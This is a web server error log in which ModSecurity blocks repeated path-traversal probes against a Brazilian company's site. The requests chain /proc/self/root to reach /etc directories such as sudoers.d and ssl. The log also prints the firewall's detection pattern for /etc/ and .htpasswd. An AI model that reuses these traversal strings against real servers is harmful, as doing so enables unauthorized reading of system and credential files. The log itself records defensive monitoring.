[Mon Mar 16 11:34:13.887311 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:58346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgU5f9ocpUE4ed4uDzoJgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:34:21.591379 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.241.46:60794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgU7RXjF1vJNtV6CWrwIwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:34:24.728098 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.241.46:46406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgU8AlT9VtDQc7bgUyncQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:34:29.110981 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:46412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgU9bABkC4fWIHEf8Hj7wAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:34:43.321882 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:59312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVA7ysWC90G-1nBrA-OAAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:34:44.639553 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:43930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVBNSswJuvopo3lOhYSQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:05.163667 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:43942] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVGbysWC90G-1nBrA-TwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:06.447475 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:59224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVGhXjF1vJNtV6CWrwLgAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:35:10.982910 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:59232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVHtSswJuvopo3lOhYUQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:24.242702 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:50804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVLP9ocpUE4ed4uDzoRQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:35:25.566907 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:35504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVLXjZBu2q05ozVU9PRAAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:33.291437 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.241.46:35508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVNXbQATo66fKoS7xHDAAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:39.999744 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.241.46:49074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVOxXjF1vJNtV6CWrwRQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:35:47.195300 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:39904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVQ_9ocpUE4ed4uDzoUgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:09.365111 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:48330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVWY6lpbStxTqkSktmAwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:17.943249 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:59704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVYbysWC90G-1nBrA-cwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:36:19.263181 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:42846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVY46lpbStxTqkSktmCAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:19.362580 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.228.16:42044] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgVY46lpbStxTqkSktmCQAAAlQ"]
[Mon Mar 16 11:36:20.432070 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:42852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVZNSswJuvopo3lOhYawAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:23.827542 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:42866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVZwlT9VtDQc7bgUynlQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:25.084089 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:42876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVadSswJuvopo3lOhYbAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:27.447086 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.241.46:42878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVa3jZBu2q05ozVU9PWwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:36:35.294108 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:37952] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVc7ysWC90G-1nBrA-fgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:36:47.181245 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:37962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgVf_9ocpUE4ed4uDzocwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
